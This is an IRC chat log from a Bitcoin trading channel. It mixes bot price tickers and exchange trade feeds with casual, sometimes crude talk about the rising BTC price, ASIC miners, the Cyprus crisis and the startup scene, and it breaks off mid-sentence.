no, i don't have bitcoin's funniest inbox. bitcoin is just too funny for one single person. Mar 21 12:25:03 milk toad is the dumbest thing ever Mar 21 12:25:13 I mean, how can you NOT know thats a cia op Mar 21 12:25:37 Diablo-D3 that aside, making a support ticked with your legit btc/usd exchanger on how to do this... Mar 21 12:25:53 yeah, thats just, wat Mar 21 12:26:02 especially since how the fuck is the exchange supposed to help you Mar 21 12:26:12 bitcoin _already does this_ Mar 21 12:26:20 yeah Mar 21 12:26:25 I assume milk toad gives you a unique address to send to Mar 21 12:26:27 just _send it there_ Mar 21 12:26:28 [MPEX] [S.MPOE] 6900 @ 0.00074086 = 5.1119 BTC [-] Mar 21 12:26:30 [MPEX] [S.MPOE] 9585 @ 0.00074208 = 7.1128 BTC [+] Mar 21 12:27:18 I dont think I wrote the actual winnings part right Mar 21 12:27:24 because it thinks I should have 1380 BTC from 33. Mar 21 12:31:15 sounds legit Mar 21 12:35:41 [BTCTC] [ASICMINER-PT] 3 @ 0.899 = 2.697 BTC [+] Mar 21 12:38:38 [BTCTC] [ASICMINER-PT] 1 @ 0.8888 BTC [-] Mar 21 12:38:40 [BTCTC] [ASICMINER-PT] 3 @ 0.885 = 2.655 BTC [-] Mar 21 12:38:42 [BTCTC] [ASICMINER-PT] 2 @ 0.885 = 1.77 BTC [-] Mar 21 12:38:44 [BTCTC] [ASICMINER-PT] 2 @ 0.88 = 1.76 BTC [-] Mar 21 12:38:45 [BTCTC] [ASICMINER-PT] 1 @ 0.873 BTC [-] Mar 21 12:38:47 [BTCTC] [ASICMINER-PT] 1 @ 0.87 BTC [-] Mar 21 12:41:16 mircea_popescu: well, I dont Mar 21 12:41:17 ALTHOUGH Mar 21 12:41:22 my early bidding wasnt 1 each Mar 21 12:41:34 er, early playing Mar 21 12:42:22 mircea_popescu: my luck is probably going to run out, but average winning is 2.39% over 351 tries Mar 21 12:42:42 pretty cool. Mar 21 12:42:45 i've never won anything. Mar 21 12:43:12 I wish I had that 1380 Mar 21 12:43:24 then I'd be able to afford to start DMC 2.0 Mar 21 12:44:37 [MPEX] [S.BBET] 50 @ 0.0018 = 0.09 BTC [+] Mar 21 12:48:21 oh durr Mar 21 12:48:25 I confused my variables Mar 21 12:48:43 yeah, my winnings are much more realistic now Mar 21 12:49:20 http://pastebin.com/vEbmt6PD Mar 21 13:03:08 https://lh3.googleusercontent.com/-lgm4poF3JWE/TgsHwby-BlI/AAAAAAAADwQ/twan94HT6p4/020.jpg Mar 21 13:03:11 ahaha so old, so new. Mar 21 13:03:18 [MPEX] [S.DICE] 6047 @ 0.00517705 = 31.3056 BTC [-] Mar 21 13:15:59 [MPEX] [S.MPOE] 12900 @ 0.00073828 = 9.5238 BTC [-] Mar 21 13:18:06 strange...my phone suddenly says "Bitcoin: Package is invalid" Mar 21 13:18:58 reinstalled the wallet app, all seems ok Mar 21 13:19:25 good that i keep only pocket change there (if 1BTC is to be considered pocket change lol) Mar 21 13:21:09 hey mp Mar 21 13:21:11 u here Mar 21 13:21:37 yeah Mar 21 13:21:55 you should change the math question to more exotic ones Mar 21 13:22:04 answering 36 everytime gets boring Mar 21 13:22:06 [BTCTC] [SYNERGY] 1 @ 0.01358 BTC [-] Mar 21 13:22:16 and a bot can easily spam it if they know the answer Mar 21 13:22:20 [MPEX] [S.MPOE] 2372 @ 0.00073828 = 1.7512 BTC [-] Mar 21 13:22:28 well a bot could but so far hasn't Mar 21 13:22:31 not that a bot would spam bitbet but lol Mar 21 13:22:33 yeah Mar 21 13:22:34 if it happens i guess it gets changed Mar 21 13:22:42 little incentive tyo spam really. Mar 21 13:23:01 well it was more like to see who's mathematically challenged. or not Mar 21 13:23:02 hehehe Mar 21 13:23:04 http://www.campusreform.org/blog/?ID=4668 Mar 21 13:23:10 The week of activities are set to conclude with a “Lace and Leather Burlsesque Show.” Mar 21 13:23:24 ;;ticker Mar 21 13:23:24 BTCUSD ticker | Best bid: 68.71001, Best ask: 68.89999, Bid-ask spread: 0.18998, Last trade: 68.89999, 24 hour volume: 96113.23446697, 24 hour low: 58.80000, 24 hour high: 68.90400, 24 hour vwap: 63.89423 Mar 21 13:23:31 hmm Mar 21 13:24:00 poor fucker. my acquiantance wanted to buy bitcoins, i told him yeah, ill sell you at spot price. that was when bitcoin was $59 dollars Mar 21 13:24:10 its scheduled this sunday Mar 21 13:27:31 he's getting a deal. Mar 21 13:27:37 ;;ticker Mar 21 13:27:38 BTCUSD ticker | Best bid: 68.70001, Best ask: 68.90582, Bid-ask spread: 0.20581, Last trade: 68.70001, 24 hour volume: 96314.01940328, 24 hour low: 58.80000, 24 hour high: 68.90583, 24 hour vwap: 63.91369 Mar 21 13:27:42 whoa 68 Mar 21 13:28:13 cypriot banks are still closed? Mar 21 13:28:58 till tues Mar 21 13:29:42 this is just the appetizer then Mar 21 13:31:10 was anything interesting discussed last night? Mar 21 13:31:18 https://bitcointalk.org/index.php?topic=155730.0 Mar 21 13:31:22 nothing new Mar 21 13:31:29 jurov nothing much. depends what your interests are. Mar 21 13:31:36 75% of the voters think BFL should get a scammy tag Mar 21 13:31:46 also, http://polimedia.us/dtng/c/src/135319215825.jpg Mar 21 13:31:52 i ended by catholic churches in KC, thought prolly i can be doing sth more productive Mar 21 13:32:04 o, that. Mar 21 13:32:11 well there was the entire avalon drama earlier Mar 21 13:32:33 oh yeah, batch 3 Mar 21 13:32:43 prices in BTC, not tied to fiat Mar 21 13:33:04 http://www.reuters.com/article/2013/03/21/us-cyprus-russia-euro-idUSBRE92K05K20130321 Mar 21 13:33:11 this won't end well. Mar 21 13:34:01 i wholeheartedly support avalon/bfl. as long as they cause interest in difficulty futures, which difficulty then fails to materialize Mar 21 13:34:19 so each avalon batch 3 will cost 88 btc ea Mar 21 13:34:20 haha Mar 21 13:34:28 Bowjob no, more like 115 Mar 21 13:34:39 well, 115 is the 4 modules Mar 21 13:34:52 88 btc for 3, + 2 btc for the psu Mar 21 13:34:55 then shipping Mar 21 13:34:58 ;;bc,stats Mar 21 13:35:01 Current Blocks: 227144 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 663 blocks | Next Difficulty In About: 2 days, 22 hours, 24 minutes, and 25 seconds | Next Difficulty Estimate: 6391557.23688 | Estimated Percent Change: 31.84865 Mar 21 13:35:09 they are really nailing batch 3 customers this time Mar 21 13:35:40 i don't think they want any batch 3 customers Mar 21 13:35:52 what i dont get is why are they taking a vacation Mar 21 13:35:54 i mean wtf Mar 21 13:35:55 basically, they got the design all paid and tested, will deliver whatever and now time to selfmine Mar 21 13:36:00 just relocate. Mar 21 13:36:11 move to new place, get some warehouses, start biz for real Mar 21 13:36:37 a vacation.. they already did so much.. might as well finish the damn job Mar 21 13:37:16 angela merkel can't be *that* stupid.. or she really doesn't have other option Mar 21 13:37:27 [BTCTC] [PAJKA.BOND] 17 @ 0.109 = 1.853 BTC [-] Mar 21 13:37:36 jurov they totally fucked up that. i've seriously not seen worse diplomacy since bush. Mar 21 13:37:51 yea totally Mar 21 13:38:01 basically they failed to understand the "stolen" money in the oligarchs bank accounts isn't stolen by those oligarchs from the state Mar 21 13:38:08 it's stolen by the state from the people. Mar 21 13:38:14 they pinched the bear by the nose. Mar 21 13:39:01 even without considering russians, that's still worst possible solution Mar 21 13:39:07 it's the second time she fucked up, incidentally. the closing down of nuclear plants was already indicative. she doesn't think too well. Mar 21 13:39:15 London City denizens must be seeing red, too Mar 21 13:39:21 she just goes on whatever data she has. often that's crap, and when it is she doesn't know about it,. Mar 21 13:39:34 no "data integrity sense" so to speak. Mar 21 13:39:44 angela merkel lacks the parity bit. Mar 21 13:39:48 lol Mar 21 13:41:13 when it gets to the point where retired folks see plainly they're riding into a wall and they have no clue you know things won't end well. Mar 21 13:43:37 [BTCTC] [COG.F] 1 @ 2.5 BTC [+] Mar 21 13:44:04 [MPEX] [S.MPOE] 2255 @ 0.00073552 = 1.6586 BTC [-] Mar 21 13:45:39 oh, that german bitch? Mar 21 13:45:43 shes going to destroy germany at this rate Mar 21 13:49:40 that's maybe what she was hired for Mar 21 13:51:02 so germany's bush Mar 21 13:51:06 when germany gets destroyed bad things happen Mar 21 13:51:10 pretty much comes to that. Mar 21 13:51:13 maybe we'll see the 4th reich Mar 21 13:51:27 not terribly likely. so far she's getting a dissident wing in her party Mar 21 13:51:36 and crucial allies got quashed in landeselections Mar 21 13:51:54 she's prolly getting wiped next turn Mar 21 13:53:33 in other news, all libertarian hipsters will conveniently concentrate themselves on one ship: http://www.reddit.com/r/xnation Mar 21 13:54:01 "IAmA RedditIsland Steering Team committee member and Seasteading Institute Ambassador. AMA" Mar 21 13:54:03 ok. what ? Mar 21 13:54:34 zactly as it says on title. Mar 21 13:54:57 is this some sort of manga thing ? Mar 21 13:55:22 http://hbr.org/2013/04/when-ted-lost-control-of-its-crowd/ar/1 Mar 21 13:55:25 hehehehehe Mar 21 13:59:39 sgornick re http://www.reddit.com/r/Bitcoin/comments/19jdmw/bitcoin_options_index_oix_price_sentiment/c8opxkz Mar 21 13:59:52 all the bitcoin sellers are short bitcoin from the moment they take fiat till when they deliver btc Mar 21 14:00:12 since most take the fiat first as a precaution there's unwanted short interest created in large volumes all the time Mar 21 14:04:47 damn almost 70 Mar 21 14:04:59 getting there. Mar 21 14:05:08 i guess 100 is the big q remaining Mar 21 14:05:15 just going to end badly when everyone herds to the exit Mar 21 14:05:40 but cashing out to fiat doesnt really make sense Mar 21 14:05:55 "Internet tax supporters are hoping that a vote in the U.S. Senate as early as today will finally give them enough political leverage to require Americans to pay sales taxes when shopping online. Mar 21 14:05:56 lalala. Mar 21 14:06:02 please do good people. please do. Mar 21 14:06:04 why not some people sitting on huge gains maybe they want to buystuff Mar 21 14:06:29 tiberiusiv it becomes problematic tho. the poor probably quit already, the rich really don't have a problem of getting fiat Mar 21 14:06:33 they have a problem of storing wealth Mar 21 14:06:43 i feel the same way Mar 21 14:06:48 though im not wealthy LOL Mar 21 14:06:56 http://www.campaignforliberty.org/national-blog/stop-the-internet-tax-mandate/ Mar 21 14:06:56 thats true Mar 21 14:06:57 still massive liquidity issues though Mar 21 14:07:00 i have enough fiat for the next year to eat whatever I want Mar 21 14:07:09 deadweasel nono. let them tax it. finally good reason to bitcoin. Mar 21 14:07:22 tiberiusiv you know the inflexibility article right ? Mar 21 14:07:48 mircea_popescu: i see Mar 21 14:10:07 hey mp, is your offer of get MPEX mentioned at a newspaper? Mar 21 14:10:29 erm Mar 21 14:10:32 is it still valid? Mar 21 14:10:41 *to Mar 21 14:11:14 sure. Mar 21 14:11:23 but i mean... um. Mar 21 14:11:30 it's kinda for professionals neh ? Mar 21 14:11:33 http://vancouver.24hrs.ca/ Mar 21 14:11:57 that okay? Mar 21 14:12:24 since i've got nothing productive to do but fap all day, and I don't feel like working a min wage Mar 21 14:13:29 i have no idea what that is, some local canadian paper ? Mar 21 14:13:48 yeap Mar 21 14:14:27 ah, Free Urban Daily, Avg. Circulation: 132,216 Mar 21 14:14:44 doesn't seem like worth the bother, but if you've not anything better to do why not Mar 21 14:14:58 aye Mar 21 14:16:40 ;;ticker Mar 21 14:16:43 BTCUSD ticker | Best bid: 68.43998, Best ask: 68.49999, Bid-ask spread: 0.06001, Last trade: 68.50000, 24 hour volume: 97812.61495029, 24 hour low: 59.00000, 24 hour high: 68.90583, 24 hour vwap: 64.03919 Mar 21 14:24:30 sellers are getting more motivated Mar 21 14:32:03 [MPEX] [S.MPOE] 1696 @ 0.00072466 = 1.229 BTC [-] Mar 21 14:32:05 [MPEX] [S.MPOE] 13350 @ 0.00071724 = 9.5752 BTC [-] Mar 21 14:32:29 ;;ticker Mar 21 14:32:31 BTCUSD ticker | Best bid: 67.01000, Best ask: 67.14374, Bid-ask spread: 0.13374, Last trade: 67.14374, 24 hour volume: 100774.97862368, 24 hour low: 59.00000, 24 hour high: 68.90583, 24 hour vwap: 64.15077 Mar 21 14:49:18 [BTCTC] [PAJKA.BOND] 10 @ 0.108999 = 1.09 BTC [-] Mar 21 14:50:08 [BTCTC] [PAJKA.BOND] 3 @ 0.109 = 0.327 BTC [+] Mar 21 14:54:40 so ecb cyprus window ends march 25th Mar 21 14:56:09 pardon my ignorance, window for what? Mar 21 14:57:03 nvm Mar 21 14:57:10 they are threatening :) Mar 21 14:57:57 coinbase got no more coins Mar 21 14:58:10 lvoe them canadians. http://www.youtube.com/watch?feature=player_embedded&v=w8762zEOkSo Mar 21 14:58:12 all their base Mar 21 14:58:12 doesn't make for much of a 'base' Mar 21 14:58:28 wait, coinbase what ? Mar 21 14:58:48 cannot buy, cannot send. Mar 21 14:59:08 i use them because it's easy, but it's not easy anymore. Mar 21 14:59:10 they are borked? is there a link ? Mar 21 14:59:18 news/forums article Mar 21 14:59:19 etc Mar 21 14:59:48 i just went to my account, pending transfer from yesterday still stuck. couldn't buy because they'd reached their 'daily rolling limit' Mar 21 15:00:06 this is the third time they've run out as far as I know. Mar 21 15:03:17 [BTCTC] [PAJKA.BOND] 1 @ 0.109 BTC [+] Mar 21 15:04:21 i dont understand this whole 'we're out of coins' thing Mar 21 15:06:42 i don't either Mar 21 15:06:57 fractional banking :) Mar 21 15:12:09 open a account need to pay 30btc to owner? Mar 21 15:17:02 [HAVELOCK] [SDICE] 4 @ 0.47 = 1.88 BTC [-] Mar 21 15:17:05 [HAVELOCK] [SDICE] 5 @ 0.471 = 2.355 BTC [+] Mar 21 15:17:06 [HAVELOCK] [SDICE] 1 @ 0.47139999 BTC [+] Mar 21 15:17:57 [MPEX] [S.MPOE] 2100 @ 0.00070779 = 1.4864 BTC [-] Mar 21 15:17:59 [MPEX] [S.MPOE] 8289 @ 0.00070736 = 5.8633 BTC [-] Mar 21 15:23:20 [BTCTC] [GSDPT] 6 @ 0.00439 = 0.0263 BTC [+] Mar 21 15:30:45 i'm guessing he's new Mar 21 15:34:30 ;;asks 69.99 Mar 21 15:34:33 There are currently 10853.134 bitcoins offered at or under 69.99 USD, worth 747960.59105 USD in total. | Data vintage: 0.0015 seconds Mar 21 15:34:50 [BTCTC] [GSDPT] 269 @ 0.0042 = 1.1298 BTC [-] Mar 21 15:35:55 ;;asks 68.99 Mar 21 15:35:56 There are currently 9907.9092 bitcoins offered at or under 68.99 USD, worth 682460.720431 USD in total. | Data vintage: 82.5744 seconds Mar 21 15:36:13 ;;ticker Mar 21 15:36:13 BTCUSD ticker | Best bid: 68.26000, Best ask: 68.27000, Bid-ask spread: 0.01000, Last trade: 68.27000, 24 hour volume: 102768.56697483, 24 hour low: 59.00000, 24 hour high: 68.90583, 24 hour vwap: 64.31059 Mar 21 15:36:32 ;;asks 68.88 Mar 21 15:36:32 There are currently 772.42237 bitcoins offered at or under 68.88 USD, worth 52976.3574245 USD in total. | Data vintage: 118.8765 seconds Mar 21 15:36:38 hige wall Mar 21 15:36:42 huge Mar 21 15:36:43 it'll fall Mar 21 15:36:46 must be fake Mar 21 15:36:57 obvious walls are obvious Mar 21 15:37:19 so its just big players trying to slow down the price to buy more? Mar 21 15:37:50 perhaps Mar 21 15:38:03 risingquickly is dangerous Mar 21 15:38:11 indeed Mar 21 15:38:18 twps Mar 21 15:38:36 thank you bitcoin gods Mar 21 15:39:29 *cough* #bitcoin-church *cough* Mar 21 15:41:12 ;;later tell jcpham https://sphotos-a.xx.fbcdn.net/hphotos-ash3/579961_10200487886494770_693568315_n.jpg Mar 21 15:41:12 The operation succeeded. Mar 21 15:42:12 ugh! Mar 21 15:42:13 ffs Mar 21 15:42:18 wtf did i click that Mar 21 15:43:06 http://polimedia.us/dtng/c/src/135422020536.jpg try this too Mar 21 15:43:43 bit better thx Mar 21 15:43:47 http://24.media.tumblr.com/tumblr_lovaddkzaz1qjdckmo1_500.jpg Mar 21 15:44:31 abracadabra: it wasn't address to you Mar 21 15:44:36 yes yes Mar 21 15:44:37 i know Mar 21 15:44:39 :/ Mar 21 15:44:41 i'm nosy Mar 21 15:44:43 :p Mar 21 15:44:43 s/address/addressed/ Mar 21 15:44:47 thats what you get Mar 21 15:45:02 be glad I didn't post #2 in the channel Mar 21 15:45:11 heh Mar 21 15:45:13 thx for that Mar 21 15:46:36 http://polimedia.us/dtng/c/src/128270463369.jpg ? Mar 21 15:47:35 [MPEX] [S.MPOE] 2184 @ 0.00070736 = 1.5449 BTC [-] Mar 21 15:47:36 [MPEX] [S.MPOE] 1616 @ 0.00070324 = 1.1364 BTC [-] Mar 21 15:51:02 [HAVELOCK] [SDICE] 10 @ 0.4714 = 4.714 BTC [+] Mar 21 15:52:02 [HAVELOCK] [SDICE] 1 @ 0.475 BTC [+] Mar 21 15:53:31 hi everyone! Mar 21 15:53:55 ;;ticker Mar 21 15:53:56 BTCUSD ticker | Best bid: 68.07176, Best ask: 68.10000, Bid-ask spread: 0.02824, Last trade: 68.10000, 24 hour volume: 103087.94303030, 24 hour low: 59.00000, 24 hour high: 68.90583, 24 hour vwap: 64.34889 Mar 21 15:55:38 howdy Mar 21 15:57:18 [BTCTC] [PAJKA.BOND] 9 @ 0.108 = 0.972 BTC [-] Mar 21 15:57:49 [BTCTC] [ASICMINER-PT] 1 @ 0.87 BTC [-] Mar 21 15:58:09 [BTCTC] [ASICMINER-PT] 2 @ 0.898 = 1.796 BTC [+] Mar 21 15:58:46 alloh Mar 21 16:05:22 mornin Mar 21 16:07:25 what's new? Mar 21 16:08:07 http://polimedia.us/dtng/c/src/136086280531.jpg Mar 21 16:10:23 it must be fapfapfap o clock in romania Mar 21 16:11:02 [HAVELOCK] [SDICE] 3 @ 0.46 = 1.38 BTC [-] Mar 21 16:11:28 aaalways. Mar 21 16:12:55 [BTCTC] [PAJKA.BOND] 10 @ 0.108999 = 1.09 BTC [+] Mar 21 16:24:15 anyone wanna join my echo chamber ? Mar 21 16:27:07 what is an echo chamber? Mar 21 16:30:15 a chamber of echos Mar 21 16:30:32 http://en.wikipedia.org/wiki/Echo_chamber_(media) Mar 21 16:30:49 http://en.wikipedia.org/wiki/Echo_chamber Mar 21 16:31:51 MJR_ like a failed fortress of solitude Mar 21 16:39:47 [BTCTC] [BTC-TRADING-PT] 10 @ 0.17241 = 1.7241 BTC [-] Mar 21 16:40:52 sign me up Mar 21 16:41:44 there's also naked chix Mar 21 16:43:03 [HAVELOCK] [KCIM] 1 @ 1.22 BTC [+] Mar 21 16:43:04 [HAVELOCK] [KCIM] 1 @ 1.3 BTC [+] Mar 21 16:53:14 [BTCTC] [GSDPT] 10 @ 0.004397 = 0.044 BTC [+] Mar 21 16:53:16 [BTCTC] [GSDPT] 270 @ 0.0044 = 1.188 BTC [+] Mar 21 16:53:18 [BTCTC] [GSDPT] 275 @ 0.0044 = 1.21 BTC [+] Mar 21 16:57:00 [MPEX] [S.MPOE] 5700 @ 0.00071173 = 4.0569 BTC [+] Mar 21 16:57:02 [MPEX] [S.MPOE] 6904 @ 0.00071507 = 4.9368 BTC [+] Mar 21 17:06:34 [BTCTC] [ASICMINER-PT] 2 @ 0.8979 = 1.7958 BTC [-] Mar 21 17:14:59 so, probably unlikely but I like to think this rally was my birthday present :) Mar 21 17:15:16 happy bday Mar 21 17:15:25 ;;ticker Mar 21 17:15:26 BTCUSD ticker | Best bid: 68.90000, Best ask: 68.90582, Bid-ask spread: 0.00582, Last trade: 68.90582, 24 hour volume: 107834.14770626, 24 hour low: 59.00000, 24 hour high: 68.90583, 24 hour vwap: 64.65216 Mar 21 17:15:37 ;;asks 69.98 Mar 21 17:15:40 There are currently 8729.3961 bitcoins offered at or under 69.98 USD, worth 601874.449587 USD in total. | Data vintage: 0.0014 seconds Mar 21 17:16:35 thanks :) Mar 21 17:17:48 [MPEX] [O.BTCUSD.P570T] 6 @ 0.05341351 = 0.3205 BTC [-] Mar 21 17:19:12 I'm 31 now...old man Mar 21 17:20:47 younger than i Mar 21 17:21:22 I'd think the "-assets" channel suffix kind of implies an over-30 set Mar 21 17:21:24 my birthday is soon, i want 1btc=$100 for my birthday Mar 21 17:21:42 oh i bet we have a fair amount of youngins Mar 21 17:22:22 sure, but i'd bet it skews a whole generation older than #bitcoin =P Mar 21 17:22:31 oh nice Mar 21 17:22:35 I feel better Mar 21 17:22:41 heh Mar 21 17:22:47 in the NYC start up scene im old Mar 21 17:23:00 y'all hiring? Mar 21 17:23:01 hehe Mar 21 17:23:11 bunch of 24 year olds running around Mar 21 17:23:30 changing the world with rounded corners and drop shadows ;) Mar 21 17:23:31 they need some grown ups around, whether they know it or not Mar 21 17:23:36 lol yes Mar 21 17:23:40 ;;calc 2013 - 24 Mar 21 17:23:40 1989 Mar 21 17:23:43 lol Mar 21 17:23:58 wow, post-Reagan Mar 21 17:24:12 as far as hiring, not yet, hopefully soon? Mar 21 17:24:17 dropshadows are for amatuers Mar 21 17:24:21 hehehe Mar 21 17:24:44 those born after Reagan probably know a thing or two about Ronald, but those of us who lived through it remember NANCY Mar 21 17:24:44 yes you know you are l33t when you get gradients going... Mar 21 17:24:59 lol Mar 21 17:25:07 haha splnkr Mar 21 17:25:09 mjr ur a designer? Mar 21 17:25:17 no... Mar 21 17:25:30 but I can and do design pages Mar 21 17:25:44 why the dropshadow ref Mar 21 17:25:58 I just like to make fun of most web based things which focus on form over function Mar 21 17:26:11 I actually like those things Mar 21 17:26:28 i rather remember Raisa Maximovna :DD Mar 21 17:26:31 but those+jQuery do not make you an awesome app Mar 21 17:26:45 [BTCTC] [ASICMINER-PT] 9 @ 0.859 = 7.731 BTC [-] Mar 21 17:27:04 [BTCTC] [ASICMINER-PT] 1 @ 0.859 BTC [-] Mar 21 17:27:05 ;;ticker Mar 21 17:27:06 BTCUSD ticker | Best bid: 68.75000, Best ask: 68.90581, Bid-ask spread: 0.15581, Last trade: 68.75000, 24 hour volume: 107979.47490578, 24 hour low: 59.00000, 24 hour high: 68.90583, 24 hour vwap: 64.67794 Mar 21 17:27:11 ;;bc,convert eur Mar 21 17:27:12 1 BTC = 68.75000 U.S. dollars = 53.3359193 Euros Mar 21 17:27:38 [BTCTC] [PAJKA.BOND] 2 @ 0.108999 = 0.218 BTC [+] Mar 21 17:28:22 I just think that a lot of people are too focused on appearances, and it's kind of shallow in the web startup scene Mar 21 17:28:47 I think bitcoin is more focused on substance rather than "social" features Mar 21 17:29:03 anyway, I am a generalist, jack of all trades Mar 21 17:29:13 def master of none Mar 21 17:29:21 think design & mktg are important, but not an excuse to have lacluster sunstance or functionality Mar 21 17:29:27 substance Mar 21 17:29:44 [BTCTC] [ASICMINER-PT] 1 @ 0.859 BTC [-] Mar 21 17:29:55 well, what did you expect? 20somethings to tackle deeper issues? Mar 21 17:29:55 in general most bitcoin biz is bad at business Mar 21 17:30:41 i was in one coworking house here, too... they do marketing and take it very seriously Mar 21 17:30:57 datamining about what makes something viral.. their holy grail Mar 21 17:32:02 yep Mar 21 17:32:05 they are never going to get it Mar 21 17:32:16 what i'm doing went completely beyond them... and when i told "and i also manage difficulty derivatives on other exchange" outright laughter Mar 21 17:32:26 [BTCTC] [ASICMINER-PT] 1 @ 0.85 BTC [-] Mar 21 17:32:36 like...being able to say words like "viral" and "long tail" is not enough Mar 21 17:32:40 [BTCTC] [ASICMINER-PT] 1 @ 0.845202 BTC [-] Mar 21 17:32:50 [BTCTC] [ASICMINER-PT] 2 @ 0.845201 = 1.6904 BTC [-] Mar 21 17:33:00 new fringe marketing is always passe after a year or two Mar 21 17:33:03 always somehting new Mar 21 17:33:03 [BTCTC] [ASICMINER-PT] 11 @ 0.8451 = 9.2961 BTC [-] Mar 21 17:33:08 jurov: yes, exactly. Mar 21 17:33:18 groupon, dead Mar 21 17:33:25 social media, profitless Mar 21 17:33:28 [BTCTC] [ASICMINER-PT] 1 @ 0.845 BTC [-] Mar 21 17:33:32 et Mar 21 17:33:33 c Mar 21 17:33:38 I guess it is just don't let pretty effects be a crutch or mask poor functionality Mar 21 17:33:40 [BTCTC] [ASICMINER-PT] 1 @ 0.84455 BTC [-] Mar 21 17:33:49 less is more Mar 21 17:33:53 I agree Mar 21 17:33:56 [BTCTC] [ASICMINER-PT] 1 @ 0.8445 BTC [-] Mar 21 17:33:58 [BTCTC] [ASICMINER-PT] 1 @ 0.843 BTC [-] Mar 21 17:34:00 [BTCTC] [ASICMINER-PT] 1 @ 0.842 BTC [-] Mar 21 17:34:02 [BTCTC] [ASICMINER-PT] 1 @ 0.842 BTC [-] Mar 21 17:34:12 by the way? how does the smoky dragon award work? Mar 21 17:34:19 i actually wanted to get in touch with the founder, he created finviz.com so i thought he may be interested Mar 21 17:34:20 is it a nomination thing? Mar 21 17:34:29 [BTCTC] [ASICMINER-PT] 1 @ 0.8321 BTC [-] Mar 21 17:34:31 application? Mar 21 17:34:35 but he got a daughter so was never around Mar 21 17:34:45 [BTCTC] [ASICMINER-PT] 1 @ 0.832 BTC [-] Mar 21 17:34:55 or he was tired from the kindergarten :) Mar 21 17:35:28 to which august body should I submit my claim for the Slightly Smoking Dragon award? Mar 21 17:37:26 how is the shared space jurov Mar 21 17:37:36 I may look into something like that Mar 21 17:38:32 MJR_ submit it to rota :) Mar 21 17:39:27 and the coworking.. dunno. while being able to smoke waterpipe while working is very fine Mar 21 17:39:41 i ended up working back from home Mar 21 17:39:50 [MPEX] [S.DICE] 1425 @ 0.00496604 = 7.0766 BTC [-] Mar 21 17:40:35 i didn't really got the human interaction i hoped for Mar 21 17:41:22 yeah, I can see that happening Mar 21 17:41:45 I think there is a huge untapped market for a more ubiquitous shared work space Mar 21 17:41:56 that is basically what Starbucks is Mar 21 17:42:56 if someone could offer what Starbucks offers, but better (more professional seating, Ethernet jacks, small conference rooms) and then franchise it Mar 21 17:43:26 well, mere "shared space" isn't what i need Mar 21 17:43:37 yes, it's the interactions... Mar 21 17:43:40 i need to talk with someone who is interested in waht i do Mar 21 17:43:46 I agree Mar 21 17:43:57 feel the same way Mar 21 17:44:17 otherwise i have everything i need within 50m of my flat :) Mar 21 17:44:28 I am wondering if any of the hacker spaces in NYC have bitcoin fever Mar 21 17:53:05 ;;ticker Mar 21 17:53:05 BTCUSD ticker | Best bid: 68.60001, Best ask: 68.89000, Bid-ask spread: 0.28999, Last trade: 68.60001, 24 hour volume: 85316.30339518, 24 hour low: 61.60000, 24 hour high: 68.90583, 24 hour vwap: 65.50233 Mar 21 17:53:39 ;;bc,24hprc/[ticker --last] Mar 21 17:53:40 Error: "bc,24hprc/" is not a valid command. Mar 21 17:53:45 ;;bc,24hprc / [ticker --last] Mar 21 17:53:47 65.41 Mar 21 17:53:58 ;;calc [bc,24hprc] / [ticker --last] Mar 21 17:54:00 0.95349840328 Mar 21 17:54:07 comment fuckup spam Mar 21 17:57:31 [BTCTC] [MININGCO.ETF] 2 @ 0.54 = 1.08 BTC [-] Mar 21 18:00:57 ;;ticker Mar 21 18:01:04 BTCUSD ticker | Best bid: 69.31945, Best ask: 69.89000, Bid-ask spread: 0.57055, Last trade: 70.00000, 24 hour volume: 92664.38564521, 24 hour low: 61.60000, 24 hour high: 68.90583, 24 hour vwap: 65.81245 Mar 21 18:01:30 how can the last trade be > 24 hour high? :( Mar 21 18:01:43 [MPEX] [S.MPOE] 10100 @ 0.00072659 = 7.3386 BTC [+] Mar 21 18:01:49 pizzaman1337: are you not familiar with the way religion works? Mar 21 18:01:52 it's like that Mar 21 18:02:11 they come from different sources Mar 21 18:02:43 ;;ticker Mar 21 18:02:44 BTCUSD ticker | Best bid: 70.00000, Best ask: 70.01000, Bid-ask spread: 0.01000, Last trade: 70.01000, 24 hour volume: 92664.38564521, 24 hour low: 61.60000, 24 hour high: 68.90583, 24 hour vwap: 65.81245 Mar 21 18:03:54 i think the high comes from mtgox's http ticker, and the last is a stored value from the websocket Mar 21 18:04:26 ok, http must be behind, but I look at that one frequently Mar 21 18:04:41 ;;goxlag Mar 21 18:04:42 227.236835 seconds Mar 21 18:04:47 looks like that wall at 69 is gone though, obviously Mar 21 18:04:49 'cause amphipod showed the 70 at about the same time you tickered Mar 21 18:05:02 71.25 Mar 21 18:05:53 ;;ticker Mar 21 18:05:54 BTCUSD ticker | Best bid: 70.55000, Best ask: 71.00000, Bid-ask spread: 0.45000, Last trade: 70.55000, 24 hour volume: 92664.38564521, 24 hour low: 61.60000, 24 hour high: 68.90583, 24 hour vwap: 65.81245 Mar 21 18:06:19 coinlab seems to have the freshest data Mar 21 18:07:46 well, looks like this one should be closing out before too long if this keeps up: http://bitbet.us/bet/206/bitcoin-market-cap-above-1-billion-before-end/ Mar 21 18:09:18 $71 fuck Mar 21 18:09:39 we've been outside of a 20day std. dev. for 3 days now Mar 21 18:09:40 it keeps surprising me with how fast it moves Mar 21 18:09:54 someone mustve clicked the coinlab Buy $500k button Mar 21 18:10:00 lol nice Mar 21 18:10:11 bitcoin stahp! Mar 21 18:10:30 buy before there are no bitcoins left! Mar 21 18:10:35 lol yeah Mar 21 18:10:42 i bet a lotta people look at this chart and see nothing but pump and dump Mar 21 18:10:46 yep Mar 21 18:10:56 that's why I wish it would slow back down Mar 21 18:11:14 MJR_ help it by selling all u got Mar 21 18:11:19 100 by 2014...but the market knows best I guess Mar 21 18:11:25 hehehe Mar 21 18:11:37 i don't see how there's any ceiling Mar 21 18:11:38 to be honest...I don't have a lot of coin Mar 21 18:11:38 100 by May Mar 21 18:11:55 it's all tied up in bonds and stocks and options Mar 21 18:12:20 and I don't want to unwind those positions...but and hold strategy Mar 21 18:12:24 buy* Mar 21 18:12:31 well, if peeps in the eu really are getting spooked and buying coins, when will the spooing end Mar 21 18:12:40 the ceiling is total monetary value in the global economy divided by 21 million Mar 21 18:12:45 that's a lot more than 100 Mar 21 18:12:48 yes Mar 21 18:12:48 butt and hold is my strategy too :D Mar 21 18:12:53 hehehe Mar 21 18:13:14 splnkr: that's a pipedream tho Mar 21 18:13:15 technically...the ceiling is all the goods and 